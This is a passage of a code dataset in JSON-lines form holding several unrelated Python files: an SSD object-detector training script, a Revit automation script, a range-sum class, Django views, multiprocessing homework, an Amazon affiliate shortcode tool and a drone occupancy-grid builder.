如果想要检测小物体,可以修改anchors_size\r\n # 一般调小浅层先验框的大小就行了!因为浅层负责小物体检测!\r\n # 比如anchors_size = [21,45,99,153,207,261,315]\r\n # ----------------------------------------------------#\r\n anchors_size = [30, 60, 111, 162, 213, 264, 315]\r\n priors = get_anchors((input_shape[0], input_shape[1]), anchors_size)\r\n bbox_util = BBoxUtility(NUM_CLASSES, priors)\r\n\r\n model = SSD300(input_shape, NUM_CLASSES, anchors_size)\r\n # ------------------------------------------------------#\r\n # 训练自己的数据集时提示维度不匹配正常\r\n # 预测的东西都不一样了自然维度不匹配\r\n # ------------------------------------------------------#\r\n\r\n # 加载预训练模型\r\n model_path = 'model_data/essay_mobilenet_ssd_weights.h5'\r\n model.load_weights(model_path, by_name=True, skip_mismatch=True)\r\n\r\n # -------------------------------------------------------------------------------#\r\n # 训练参数的设置\r\n # logging表示tensorboard的保存地址\r\n # 
checkpoint用于设置权值保存的细节,period用于修改多少epoch保存一次\r\n # reduce_lr用于设置学习率下降的方式\r\n # early_stopping用于设定早停,val_loss多次不下降自动结束训练,表示模型基本收敛\r\n # -------------------------------------------------------------------------------#\r\n logging = TensorBoard(log_dir=log_dir)\r\n\r\n checkpoint = ParallelModelCheckpoint(model, log_dir + 'ep{epoch:03d}-loss{loss:.3f}-val_loss{val_loss:.3f}.h5',\r\n monitor='val_loss', save_weights_only=True,save_best_only=False,\r\n period=1) # 解决多GPU运行下保存模型报错的问题\r\n\r\n reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.5, patience=3, verbose=1)\r\n early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=10, verbose=1)\r\n\r\n # ----------------------------------------------------------------------#\r\n # 验证集的划分在train.py代码里面进行\r\n # 2007_test.txt和2007_val.txt里面没有内容是正常的。训练不会使用到。\r\n # 当前划分方式下,验证集和训练集的比例为1:9\r\n # ----------------------------------------------------------------------#\r\n val_split = 0.1\r\n with open(annotation_path) as f:\r\n lines = f.readlines()\r\n np.random.seed(10101)\r\n np.random.shuffle(lines)\r\n np.random.seed(None)\r\n num_val = int(len(lines) * val_split)\r\n num_train = len(lines) - num_val\r\n\r\n # ------------------------------------------------------#\r\n # 主干特征提取网络特征通用,冻结训练可以加快训练速度\r\n # 也可以在训练初期防止权值被破坏。\r\n # Init_Epoch为起始世代\r\n # Freeze_Epoch为冻结训练的世代\r\n # Epoch总训练世代\r\n # 提示OOM或者显存不足请调小Batch_size\r\n # ------------------------------------------------------#\r\n\r\n print(\"******************** before model ********************\")\r\n model.summary()\r\n if Cuda:\r\n model = multi_gpu_model(model,gpus=2) # 2块GPU训练\r\n print(\"******************** after model ********************\")\r\n model.summary()\r\n\r\n # ------------------------#\r\n # 冻结训练 #\r\n # -----------------------#\r\n for i in range(21): # 80\r\n model.layers[3].layers[i].trainable = False # 注意模型被包装到multi_gpu_model,加layers[3]\r\n if True:\r\n Init_epoch = 0\r\n Freeze_epoch = 50\r\n BATCH_SIZE = 16\r\n learning_rate_base = 
5e-4\r\n\r\n gen = Generator(bbox_util, BATCH_SIZE, lines[:num_train], lines[num_train:],\r\n (input_shape[0], input_shape[1]), NUM_CLASSES)\r\n\r\n model.compile(optimizer=Adam(lr=learning_rate_base),\r\n loss=MultiboxLoss(NUM_CLASSES, neg_pos_ratio=3.0).compute_loss)\r\n model.fit_generator(gen.generate(True),\r\n steps_per_epoch=num_train // BATCH_SIZE,\r\n validation_data=gen.generate(False),\r\n validation_steps=num_val // BATCH_SIZE,\r\n epochs=Freeze_epoch,\r\n initial_epoch=Init_epoch,\r\n callbacks=[logging, checkpoint, reduce_lr, early_stopping],\r\n workers=16)\r\n\r\n # ------------------------#\r\n # 解冻训练 #\r\n # -----------------------#\r\n for i in range(21): # 80\r\n model.layers[3].layers[i].trainable = True # 注意模型被包装到multi_gpu_model,加layers[3]\r\n if True:\r\n Freeze_epoch = 50\r\n Epoch = 100\r\n BATCH_SIZE = 8\r\n learning_rate_base = 1e-4\r\n\r\n gen = Generator(bbox_util, BATCH_SIZE, lines[:num_train], lines[num_train:],\r\n (input_shape[0], input_shape[1]), NUM_CLASSES)\r\n\r\n model.compile(optimizer=Adam(lr=learning_rate_base),\r\n loss=MultiboxLoss(NUM_CLASSES, neg_pos_ratio=3.0).compute_loss)\r\n model.fit_generator(gen.generate(True),\r\n steps_per_epoch=num_train // BATCH_SIZE,\r\n validation_data=gen.generate(False),\r\n validation_steps=num_val // BATCH_SIZE,\r\n epochs=Epoch,\r\n initial_epoch=Freeze_epoch,\r\n callbacks=[logging, checkpoint, reduce_lr, early_stopping],\r\n workers=16)\r\n","sub_path":"train-multi-gpu.py","file_name":"train-multi-gpu.py","file_ext":"py","file_size_in_byte":8059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"129184817","text":"def func1():\n nums = list(map(int, input()[1:-1].split(\",\")))\n res, maximum = 0, 0\n for i in range(0, len(nums), 1):\n maximum = max(maximum, nums[i])\n if maximum == i:\n res += 1\n print(res)\n 
return\nfunc1()","sub_path":"Code/CodeRecords/2443/60624/265673.py","file_name":"265673.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"153905070","text":"from __future__ import print_function\r\n\r\n#===============================================================================\r\n# pyRevit\r\n#===============================================================================\r\n__doc__ = 'Test'\r\n\r\n#===============================================================================\r\n# Logging\r\n#===============================================================================\r\nimport logging\r\nlogging.basicConfig(level=logging.DEBUG)\r\n\r\n#===============================================================================\r\n# Import Revit\r\n#===============================================================================\r\nrvt_app = __revit__.Application\r\nrvt_uidoc = __revit__.ActiveUIDocument\r\nrvt_doc = __revit__.ActiveUIDocument.Document\r\nimport Autodesk.Revit.DB as rvt_db\r\n\r\n#===============================================================================\r\n# Configuration\r\n#===============================================================================\r\nOVERVIEWPLAN_CENTER = rvt_db.XYZ(1.656061764, 1.323727996, 0.036311942)\r\n\r\n#===============================================================================\r\n# Imports other\r\n#===============================================================================\r\nimport sys\r\nfrom collections import defaultdict\r\n\r\n\r\npath_package = r\"C:\\EclipseGit\\ExergyUtilities\\ExergyUtilities\"\r\nsys.path.append(path_package)\r\nimport utility_revit_api as util_ra\r\n\r\n#===============================================================================\r\n# Definitions\r\n#===============================================================================\r\ndef update_sheets_views(excel_dict, 
sheets_by_name, views, viewports):\r\n logging.debug(util_ra.get_self())\r\n count = 0\r\n for i,row in enumerate(excel_dict):\r\n \r\n assert row['SOURCE'] == 'RVT'\r\n if row['VIEW TYPE'] != 'PLAN':\r\n continue\r\n\r\n assert row['Sheet Name'] in sheets_by_name, \"Sheet {} does not exist\".format(row['Sheet Name'])\r\n assert row['View Name'] in views, \"View {} does not exist\".format(row['View Name'])\r\n assert row['MAIN VIEWPORT'] in viewports, \"Viewport {} does not exist\".format(row['MAIN VIEWPORT'])\r\n\r\n # Test views in register matches views placed in Revit\r\n placed_views = sheets_by_name[row['Sheet Name']].GetAllPlacedViews() \r\n view_match = False\r\n legend_match = False\r\n for view_id in placed_views:\r\n view = rvt_doc.GetElement(view_id)\r\n if view.Name == row['View Name']:\r\n view_match = True\r\n \r\n # Test view match\r\n if not view_match:\r\n count+=1\r\n print(\"Add {} to {}\".format(row['View Name'],row['Sheet Name']))\r\n util_ra.add_view_sheet(rvt_doc, \r\n sheets_by_name[row['Sheet Name']], \r\n views[row['View Name']], \r\n OVERVIEWPLAN_CENTER,\r\n viewports[row['MAIN VIEWPORT']].GetTypeId())\r\n \r\n logging.debug(\"Added views to {} sheets\".format(count))\r\n \r\n\r\n#===============================================================================\r\n# Main\r\n#===============================================================================\r\n#-Logging info---\r\nlogging.info(\"Python version : {}\".format(sys.version))\r\nlogging.info(\"uidoc : {}\".format(rvt_uidoc))\r\nlogging.info(\"doc : {}\".format(rvt_doc))\r\nlogging.info(\"app : {}\".format(rvt_app))\r\n\r\n#-Paths---\r\nfolder_csv = r\"C:\\CesCloud Revit\\_03_IKEA_Working_Folder\"\r\nname_csv = r\"\\20160722 Document Register.csv\"\r\npath_csv = folder_csv + name_csv\r\n\r\n#-Get data---\r\ndata_dict = util_ra.get_data_csv(path_csv)\r\ndata_dict_RVT = [row for row in data_dict if row['SOURCE'] == 'RVT']\r\n\r\n#-Get all floorplans, sheets_by_name, titleblocks, 
legends---\r\nutil_ra.get_all_views(rvt_doc)\r\ntitle_blocks = util_ra.get_title_blocks(rvt_doc)\r\nsheets_by_name = util_ra.get_sheet_dict_by_names(rvt_doc)\r\nfloorplans = util_ra.get_views_by_type(rvt_doc, 'FloorPlan')\r\nall_views = util_ra.get_all_views(rvt_doc)\r\nlegends = util_ra.get_views_by_type(rvt_doc,'Legend')\r\ntemplates = util_ra.get_view_templates(rvt_doc)\r\nviewports = util_ra.get_viewports_dict_by_names(rvt_doc)\r\n\r\n#-Check---\r\nupdate_sheets_views(data_dict_RVT,sheets_by_name,all_views,viewports)\r\n\r\nlogging.info(\"---DONE---\".format())","sub_path":"RevitAPI/pyRevit/MJ_PlaceMainViews.py","file_name":"MJ_PlaceMainViews.py","file_ext":"py","file_size_in_byte":4420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"278489917","text":"# Time: ctor: O(m * n),\n# lookup: O(1)\n# Space: O(m * n)\n#\n# Given a 2D matrix matrix, find the sum of the elements inside\n# the rectangle defined by its upper left corner (row1, col1)\n# and lower right corner (row2, col2).\n#\n# Range Sum Query 2D\n# The above rectangle (with the red border) is defined by\n# (row1, col1) = (2, 1) and (row2, col2) = (4, 3),\n# which contains sum = 8.\n#\n# Example:\n# Given matrix = [\n# [3, 0, 1, 4, 2],\n# [5, 6, 3, 2, 1],\n# [1, 2, 0, 1, 5],\n# [4, 1, 0, 1, 7],\n# [1, 0, 3, 0, 5]\n# ]\n#\n# sumRegion(2, 1, 4, 3) -> 8\n# sumRegion(1, 1, 2, 2) -> 11\n# sumRegion(1, 2, 2, 4) -> 12\n# Note:\n# You may assume that the matrix does not change.\n# There are many calls to sumRegion function.\n# You may assume that row1 <= row2 and col1 <= col2.\n\nclass NumMatrix(object):\n def __init__(self, matrix):\n \"\"\"\n initialize your data structure here.\n :type matrix: List[List[int]]\n \"\"\"\n if not matrix: # otherwise len(matrix[0]): IndexError: list index out of range\n return\n\n m, n = len(matrix), len(matrix[0])\n self.__sums = [[0] * (n+1) for _ in range(m+1)]\n for i in xrange(1, m+1):\n for j in xrange(1, n+1):\n 
self.__sums[i][j] = self.__sums[i][j-1] + self.__sums[i-1][j] - \\\n self.__sums[i-1][j-1] + matrix[i-1][j-1]\n '''\n for i in range(m):\n val = 0\n for j in range(n):\n val += matrix[i][j]\n self.__sums[i+1][j+1] = self.__sums[i][j+1] + val\n '''\n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\"\n sum of elements matrix[(row1,col1)..(row2,col2)], inclusive.\n :type row1: int\n :type col1: int\n :type row2: int\n :type col2: int\n :rtype: int\n \"\"\"\n return self.__sums[row2+1][col2+1] - self.__sums[row2+1][col1] - \\\n self.__sums[row1][col2+1] + self.__sums[row1][col1]\n\n\n# Your NumMatrix object will be instantiated and called as such:\n# numMatrix = NumMatrix(matrix)\n# numMatrix.sumRegion(0, 1, 2, 3)\n# numMatrix.sumRegion(1, 2, 3, 4)\n","sub_path":"Python/range-sum-query-2d-immutable.py","file_name":"range-sum-query-2d-immutable.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"600927264","text":"from .models import *\nimport json\nfrom django.shortcuts import *\nfrom django.views import generic\nfrom django.core.paginator import Paginator\nfrom django.http import HttpResponseBadRequest, JsonResponse\n\nclass IndexView(generic.ListView):\n model = Student\n template_name = 'student/admin_base.html'\n context_object_name = 'student_list'\n paginate_by = 4\n\n # def get_queryset(self):\n # students = self.paginator.page(self.current_page)\n # return students\n # return Student.objects.order_by('-student_age')[:]\n # return Student.objects.filter(student_sex__contains='girl')\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super(IndexView, self).get_context_data(**kwargs)\n\n paginator = context.get('paginator')\n page = context.get('page_obj')\n page_data = self.get_page_data(paginator, page)\n context.update(page_data)\n return context\n\n\n @staticmethod\n def get_page_data(paginator, page):\n\n page_list = []\n\n # 
==============分页逻辑===============\n # 条件:页数>=10\n # 当前页<=5时,起始页为1\n # 当前页>(总页数-5)时,起始页为(总页数-9)\n # 其他情况 起始页为(当前页-5)\n # ====================================\n\n if paginator.num_pages > 10:\n if page.number <= 5:\n start_page = 1\n elif page.number > paginator.num_pages - 5:\n start_page = paginator.num_pages - 9\n else:\n start_page = page.number - 5\n\n for i in range(start_page, start_page + 10):\n page_list.append(i)\n else:\n for i in range(1, paginator.num_pages + 1):\n page_list.append(i)\n\n page_data = {'page_list': page_list}\n return page_data\n\nclass DetailView(generic.DetailView):\n model = Student\n template_name = 'student/detail.html'\n context_object_name = 'student'\n\ndef comment(request):\n if not request.is_ajax():\n return HttpResponseBadRequest()\n studentid = request.GET.get('studentId')\n comments = Comment.objects.filter(student_id__exact=studentid).values() # values() 转为字典\n json_list = list(comments)\n return JsonResponse(json_list, safe=False)","sub_path":"DjangoLearning/student/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"454641150","text":"# 1.使用两个进程,对同一个全局变量进行修改多次,会出现什么情况。\r\nimport multiprocessing,random,os,time\r\n# g=0\r\n# def add():\r\n# global g\r\n# for i in range(10000000):\r\n# g+=1\r\n# print(\"在add方法中g={}\".format(g))\r\n# def add1():\r\n# global g\r\n# for i in range(10):\r\n# g+=1\r\n#\r\n# print(\"在add1方���中g={}\".format(g))\r\n#\r\n# if __name__==\"__main__\":\r\n# p1=multiprocessing.Process(target=add)\r\n# p2=multiprocessing.Process(target=add1)\r\n# p1.start()\r\n# p2.start()\r\n# print(\"主程序中的g={}\".format(g))\r\n\r\n\r\nimport threading\r\n\r\ng=0\r\ndef add():\r\n global g\r\n for i in range(10000000):\r\n g+=1\r\n print(\"在add方法中g={}\".format(g))\r\nif __name__==\"__main__\":\r\n p1=threading.Thread(target=add)\r\n p2=threading.Thread(target=add)\r\n p1.start()\r\n p2.start()\r\n 
print(\"主程序中的g={}\".format(g))\r\n\r\n# 2.使用进程队列完成生产者消费者的例子\r\ndef produce(q):\r\n while True:\r\n tu=(\"香蕉\",\"苹果\",\"葡萄\")\r\n v=random.choice(tu)\r\n q.put(v)\r\n print(\"进程{}生产了{}\".format(os.getpid(),v))\r\n time.sleep(0.5)\r\n\r\n\r\ndef consume(q):\r\n while True:\r\n print(\"进程{}消费了{}\".format(os.getpid(),q.get()))\r\n time.sleep(1)\r\n\r\nif __name__==\"__main__\":\r\n q=multiprocessing.Queue()\r\n p1=multiprocessing.Process(target=produce,args=(q,))\r\n p2=multiprocessing.Process(target=consume,args=(q,))\r\n p1.start()\r\n p2.start()\r\n","sub_path":"code/day19/day18homework.py","file_name":"day18homework.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"125155227","text":"#!/bin/python3\n\nimport sys\n\n\nn = int(input().strip())\narr = [int(arr_temp) for arr_temp in input().strip().split(' ')]\n\npos = 0\nneg = 0\nzero = 0\n\nfor i in arr:\n if i > 0:\n pos+=1\n elif i < 0:\n neg+=1\n else:\n zero+=1\n\nprint(pos / float(n))\nprint(neg / float(n))\nprint(zero / float(n))\n","sub_path":"plus_minus.py","file_name":"plus_minus.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"52284604","text":"\nimport amazon.api\nimport os\nimport subprocess\nfrom PIL import Image, ImageTk\nimport PIL\nimport requests\nfrom io import BytesIO\nimport tkinter as tk\nfrom tkinter import *\nimport sys\nfrom collections import namedtuple\nfrom PyInquirer import prompt\nfrom ShGetter.main import get_product_sh\n\n\naccess_key_id = os.environ['AWS_ACCESS_KEY_ID']\nsecret_access_key = os.environ['AWS_SECRET_ACCESS_KEY']\nassociate_tag = os.environ['ASSOCIATE_TAG']\nregion = os.environ['AWS_REGION']\n\namazon = amazon.api.AmazonAPI(access_key_id, secret_access_key, associate_tag, Region=region)\n\nimage_list = []\nimage_index = 0\n\nroot = Tk() \nroot.geometry(\"600x600\")\n\npanel = 
tk.Label(root)\n\ndef main(keywords: str, get_am=True, get_sh=True) -> int:\n setup_tkinter()\n\n img_urls: [str] = []\n am: namedtuple = None\n sh: namedtuple = None\n if get_am:\n am: namedtuple = get_product_am(keywords)\n img_urls += am.img_urls\n if get_sh:\n sh: namedtuple = get_product_sh(keywords)\n img_urls += sh.img_urls\n\n img_url = prompt_choose_img(img_urls)\n\n short_code = create_shortcode(am=am, sh=sh, img_url=img_url)\n\n output(short_code)\n make_sound() \n \n return 0\n\ndef get_product_am(keywords: str) -> namedtuple:\n products = search_product_am(keywords)\n product = prompt_choose_product_am(products)\n\n afi_url = product.detail_page_url\n\n am = namedtuple('am', ('product_url', 'img_urls'))\n am.product_url = afi_url\n am.img_urls = [image.LargeImage.URL.text for image in product.images]\n return am\n\ndef search_product_am(keywords: str) -> amazon.api.AmazonSearch:\n for i in range(4):\n try:\n product = amazon.search(Keywords=keywords, SearchIndex='All')\n break\n except Exception as e:\n print(type(e), e.args, e)\n sys.exit('商品データ取得に失敗しました・・・_(._.)_')\n \n return product\n\n\ndef prompt_choose_product_am(products: amazon.api.AmazonSearch) -> amazon.api.AmazonProduct:\n product_list = [product for product in list(enumerate(products))]\n product_name_list = [f'{product[0]} {product[1].title}\\n \\\n {product[1].detail_page_url.replace(\"&tag=sabigara-22\", \"\")}\\n' \\\n for product in product_list]\n question = [\n {\n 'type': 'list',\n 'name': 'products',\n 'message': 'What do you want to do?',\n 'choices': product_name_list\n }\n ]\n answer = prompt(question)\n index = int(answer['products'][0:1])\n return product_list[index][1]\n\ndef prompt_choose_img(img_urls: [str]) -> str:\n\n index = 0\n for image_url in img_urls:\n res = requests.get(image_url)\n img = PIL.Image.open(BytesIO(res.content))\n\n img_tk = ImageTk.PhotoImage(img)\n\n image_list.append(img_tk)\n\n index += 1\n\n update_img()\n root.mainloop()\n\n return 
img_urls[image_index]\n\ndef create_shortcode(img_url: str, am: namedtuple, sh: namedtuple) -> str:\n am_product_url = ''\n sh_product_url = ''\n if am:\n am_product_url = am.product_url\n if sh:\n sh_product_url = sh.product_url\n\n return f'[afi amurl=\"{am_product_url}\" shurl=\"{sh_product_url}\" img_url=\"{img_url}\"]'\n\ndef output(short_code: str) -> None:\n process = subprocess.Popen('pbcopy', env={'LANG': 'en_US.UTF-8'}, stdin=subprocess.PIPE)\n process.communicate(short_code.encode('utf-8'))\n\n print(short_code)\n\ndef make_sound() -> None:\n os.system('afplay /System/Library/Sounds/Glass.aiff')\n\ndef setup_tkinter():\n root.bind('', show_prev)\n root.bind('', show_next)\n\n panel.pack(side=\"bottom\", fill=\"both\", expand=\"yes\")\n panel.bind(\"\", on_click)\n \ndef on_click(event):\n root.quit()\n\ndef show_prev(event):\n global image_index\n\n if not image_index <= 0:\n image_index -= 1\n\n update_img()\n\n\ndef show_next(event):\n global image_index\n\n if not image_index >= (len(image_list) - 1):\n image_index += 1\n\n update_img()\n\n\ndef update_img():\n panel.configure(image=image_list[image_index])\n panel.image = image_list[image_index]\n\n\nif __name__ == '__main__':\n keywords = '' \n if len(sys.argv) > 2:\n keywords = sys.argv[2]\n if sys.argv[1] == 'a':\n main(keywords, True, False)\n elif sys.argv[1] == 's':\n main(keywords, False, True)\n elif len(sys.argv) == 2:\n keywords = sys.argv[1]\n main(keywords)\n else:\n sys.exit('Arguments error')\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"227517337","text":"#!/usr/bin/python\n\n\"\"\"\nHeader Files\n\"\"\"\nimport matplotlib.pyplot as plt\nimport math\nimport numpy as np\nimport json\nfrom pprint import pprint\n\"\"\"\nKey value are dicts or lists\n\"\"\"\ndivision = 0.25\n\ndef line_y_cordinate_array(arr_x,p1,p2):\n\ty_arr=[]\n\tx1 = 
p1[0]\n\ty1 = p1[1]\n\tx2 = p2[0]\n\ty2 = p2[1]\n\n\tfor x in arr_x:\n\t\t y = y1 + ((y2-y1)/(x2-x1))*(x-x1)\n\ty_arr.append(y)\n\treturn y_arr\t \n\ndef line_x_cordinate_array(arr_y,p1,p2):\n\tx_arr=[]\n\tx1 = p1[0]\n\ty1 = p1[1]\n\tx2 = p2[0]\n\ty2 = p2[1]\n\n\tfor y in arr_y:\n\t\t x = x1 + ((x2-x1)/(y2-y1))*(y-y1)\n\ty_arr.append(y)\n\treturn y_arr\t\n\ndef Equidistantpoints(p1,p2):\n\tax=[] #sum of ax1 and ax2\n\tay=[] #sum of ay1 and ay2\n\tx1 = p1[0]\n\ty1 = p1[1]\n\tx2 = p2[0]\n\ty2 = p2[1]\n\n\twidth = abs(x1-x2)\n\theight = abs(y1-y2)\n\n\tminx = min(x1,x2)\n\tminy = min(y1,y2)\n\n\n\tx_parts = width/division # 8 parts\n\ty_parts = height/division # 3 parts\n\n\tax1= [minx + division*i for i in range(int(x_parts)+1)]\n\t# these are necessary points in the grid\n\tay1=line_y_cordinate_array(ax1,p1,p2)\n\n\tay2 = [miny + division*i for i in range(int(y_parts)+1)]\n\n\tax2 = line_x_cordinate_array(ay2,p1,p2)\n\n\n\tax = ax1+ax2\n\tay = ay1+ ay2\n\n\treturn ax,ay\n\n\n\n\ndef line(p1,p2):\n\tx_obs = []\n\ty_obs = []\n\tx1 = p1[0]\n\ty1 = p1[1]\n\tx2 = p2[0]\n\ty2 = p2[1]\n\n\twidth = abs(x1-x2)\n\theight = abs(y1-y2)\n\n\tminx = min(x1,x2)\n\tminy = min(y1,y2)\n\n\tif width==0.0 and height!=0.0:\n\t\ty_parts = height/division\n\t\ty_obs = [miny + 0.25*i for i in range(int(y_parts)+1)]\n\t\tx_obs = [minx for i in range(int(y_parts)+1)]\n\telif width !=0.0 and height ==0.0:\n\t\tx_parts = width/division\n\t\tx_obs = [minx+ 0.25*i for i in range(int(x_parts)+1)]\n\t\ty_obs = [miny for y in range(int(x_parts)+1)]\n\n\telif width !=0.0 and height !=0.0:\n\t\t\t\t\t\t\n\t\tx_parts = width/division\n\t\ty_parts = height/division\n\t\tfor i in range(int(y_parts)+1):\n\t\t\tfor j in range(int(x_parts)+1):\n\t\t\t\tx_obs.append(minx+division*j)\n\t\t\t\ty_obs.append(miny+division*i)\n\n\treturn x_obs,y_obs\n\n\ndef gate_side_lines(p,angle):\n\tx_obs = []\n\ty_obs = []\n\tnew_p1 = [0,0]\n\tnew_p2 = [0,0]\n\tnew_p3 = [0,0]\n\tnew_p4 = [0,0]\n\n\tif angle == -90.0:\n\t\ta 
= 90.0\n\telse:\n\t\ta = angle\n\n\n\tif a == 135.0:\n\t\tnew_p1[0] = p[0]-division\n\t\tnew_p1[1] = p[1]-division\n\t\tnew_p2[0] = new_p1[0]-division\n\t\tnew_p2[1] =\tnew_p1[1]-division\n\n\t\tLINE1_X,LINE1_Y = line(new_p1,new_p2)\n\t\tx_obs= x_obs+LINE1_X\n\t\ty_obs= y_obs+LINE1_Y\n\n\t\tnew_p3[0] = p[0]+division\n\t\tnew_p3[1] = p[1]+division\n\t\tnew_p4[0] = new_p3[0]+division\n\t\tnew_p4[1] =\tnew_p3[1]+division\n\n\t\tLINE2_X,LINE2_Y = line(new_p3,new_p4)\n\t\tx_obs= x_obs+LINE2_X\n\t\ty_obs= y_obs+LINE2_Y\n\n\n\tif a == 45.0:\n\t\tnew_p1[0] = p[0]+division\n\t\tnew_p1[1] = p[1]-division\n\t\tnew_p2[0] = new_p1[0]+division\n\t\tnew_p2[1] =\tnew_p1[1]-division\n\n\t\tLINE1_X,LINE1_Y = line(new_p1,new_p2)\n\t\tx_obs= x_obs+LINE1_X\n\t\ty_obs= y_obs+LINE1_Y\n\n\t\tnew_p3[0] = p[0]-division\n\t\tnew_p3[1] = p[1]+division\n\t\tnew_p4[0] = new_p3[0]-division\n\t\tnew_p4[1] =\tnew_p3[1]+division\n\n\t\tLINE2_X,LINE2_Y = line(new_p3,new_p4)\n\t\tx_obs= x_obs+LINE2_X\n\t\ty_obs= y_obs+LINE2_Y\n\n\n\tif a == 90.0:\n\t\tnew_p1[0] = p[0]\n\t\tnew_p1[1] = p[1]-division\n\t\tnew_p2[0] = new_p1[0]\n\t\tnew_p2[1] =\tnew_p1[1]-division\n\n\t\tLINE1_X,LINE1_Y = line(new_p1,new_p2)\n\t\tx_obs= x_obs+LINE1_X\n\t\ty_obs= y_obs+LINE1_Y\n\n\t\tnew_p3[0] = p[0]\n\t\tnew_p3[1] = p[1]+division\n\t\tnew_p4[0] = new_p3[0]\n\t\tnew_p4[1] =\tnew_p3[1]+division\n\n\t\tLINE2_X,LINE2_Y = line(new_p3,new_p4)\n\t\tx_obs= x_obs+LINE2_X\n\t\ty_obs= y_obs+LINE2_Y\n\n\n\n\n\tif a == 0.0:\n\t\tnew_p1[0] = p[0]+division\n\t\tnew_p1[1] = p[1]\n\t\tnew_p2[0] = new_p1[0]+division\n\t\tnew_p2[1] =\tnew_p1[1]\n\n\t\tLINE1_X,LINE1_Y = line(new_p1,new_p2)\n\t\tx_obs= x_obs+LINE1_X\n\t\ty_obs= y_obs+LINE1_Y\n\n\t\tnew_p3[0] = p[0]-division\n\t\tnew_p3[1] = p[1]\n\t\tnew_p4[0] = new_p3[0]-division\n\t\tnew_p4[1] =\tnew_p3[1]\n\n\t\tLINE2_X,LINE2_Y = line(new_p3,new_p4)\n\t\tx_obs= x_obs+LINE2_X\n\t\ty_obs= y_obs+LINE2_Y\t\t\t\t\t\n\n\n\tif a == 180.0:\n\t\tnew_p1[0] = p[0]+division\n\t\tnew_p1[1] = 
p[1]\n\t\tnew_p2[0] = new_p1[0]+division\n\t\tnew_p2[1] =\tnew_p1[1]\n\n\t\tLINE1_X,LINE1_Y = line(new_p1,new_p2)\n\t\tx_obs= x_obs+LINE1_X\n\t\ty_obs= y_obs+LINE1_Y\n\n\t\tnew_p3[0] = p[0]-division\n\t\tnew_p3[1] = p[1]\n\t\tnew_p4[0] = new_p3[0]-division\n\t\tnew_p4[1] =\tnew_p3[1]\n\n\t\tLINE2_X,LINE2_Y = line(new_p3,new_p4)\n\t\tx_obs= x_obs+LINE2_X\n\t\ty_obs= y_obs+LINE2_Y\n\n\n\treturn x_obs,y_obs\n\n\n\n\n\nwith open(\"/home/neil/dd2419_ws/src/course_packages/dd2419_resources/worlds_json/nav_challenge.world.json\") as file:\n data = json.load(file)\n airspace = data[\"airspace\"]\n gates = data[\"gates\"]\n gpoint = []\n gangle = []\n for i in range(len(gates)):\n gpoint.append([gates[i]['position'][0], gates[i]['position'][1]]) # point = [x,y]\n gangle.append(gates[i]['heading']) # angle = [135]\n \n #print(gangle) # gate points[[]] \n #print(gpoint) # gate angles []\n walls = data[\"walls\"]\n lmin = airspace[\"min\"]\n lmax = airspace[\"max\"]\n wstart = [walls[0]['plane']['start'], walls[1]['plane']['start']]\n wstop = [walls[0]['plane']['stop'], walls[1]['plane']['stop']]\n\n w_st1 = [wstart[0][0], wstart[0][1]]\n w_sp1 = [wstop[0][0], wstop[0][1]]\n w_st2 = [wstart[1][0], wstart[1][1]]\n w_sp2 = [wstop[1][0], wstop[1][1]]\n #print(gangle) # all heading angles for gates\n #print(lmin) # 3d grid minimum point\n\n#lets make the grid\n\nx_min = lmin[0]# -4\ny_min = lmin[1]# -2\nz_min = lmin[2]\nx_max = lmax[0]# +2\ny_max = lmax[1]# +2\nz_max = lmax[2]\n#print(x_min,y_min,x_max,y_max)\nwidth = x_max - x_min #6.0 \nheight = y_max - y_min #4.0\n\n\ngrid_width = width/division# 24\ngrid_height = height/division# 16\n\n\n\n\n\n# 1. 
lets make borders first\nox , oy = [], []\n# just for addition\n\nfor i in range(int(grid_width)+1):\n\tox.append(x_min+division*i)\n\toy.append(y_min)\n\n# print(len(ox))\n# print(ox) # 25 points including start and end but divide line segment into 24 pts\n# print(oy)\n\n\nfor i in range(int(grid_width)+1):\n\tox.append(x_min+division*i)\n\toy.append(y_max)\n\nfor i in range(int(grid_height)+1):\n\tox.append(x_min)\n\toy.append(y_min+division*i)\n\nfor i in range(int(grid_height)+1):\n\tox.append(x_max)\n\toy.append(y_min+division*i)\n\n\n\n#wall_1 = list(Equidistantpoints(w_st1,w_sp1)) # points will be [(x,y),.....]\n#wall_2 = list(Equidistantpoints(w_st2,w_sp2))\n\n\n\n#print(\"wall1\",wall_1)\n\n\n# 2. now we will make walls\n\n\nwall_1_x,wall_1_y = line(w_st1,w_sp1)\nox = ox + wall_1_x\noy = oy +wall_1_y\nwall_2_x,wall_2_y = line(w_st2,w_sp2)\nox = ox + wall_2_x\noy = oy +wall_2_y\n\n# 3. now we will make gate side lines\n\n\ngate_1_x,gate_1_y = gate_side_lines(gpoint[0],gangle[0])\nox = ox + gate_1_x\noy = oy + gate_1_y\n\ngate_2_x,gate_2_y = gate_side_lines(gpoint[1],gangle[1])\nox = ox + gate_2_x\noy = oy + gate_2_y\n\ngate_3_x,gate_3_y = gate_side_lines(gpoint[2],gangle[2])\nox = ox + gate_3_x\noy = oy + gate_3_y\n\ngate_4_x,gate_4_y = gate_side_lines(gpoint[3],gangle[3])\nox = ox + gate_4_x\noy = oy + gate_4_y\n\ngate_5_x,gate_5_y = 